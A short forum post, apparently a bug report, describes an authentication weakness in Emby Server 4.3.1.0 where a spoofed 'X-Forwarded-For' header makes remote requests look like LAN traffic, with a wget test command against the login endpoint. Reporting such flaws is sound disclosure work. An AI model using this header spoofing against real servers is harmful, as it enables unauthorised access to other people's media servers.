Hi,
I've got a premiere Emby-Server V4.3.1.0 running on Windows with remote connections enabled. It seems that one can trick the server into believing that a request is comming from LAN by setting the "X-Forwarded-For" request header. Testcase:
wget --no-check-certificate -O - https://xyz.dyndns.org:8920/Users/authenticatebyname \
--header 'x-emby-authorization: MediaBrowser Client="Emby Web", Device="WGET", DeviceId="XYZ", Version="4.3.1.0"' \
--header 'content-type: application/json'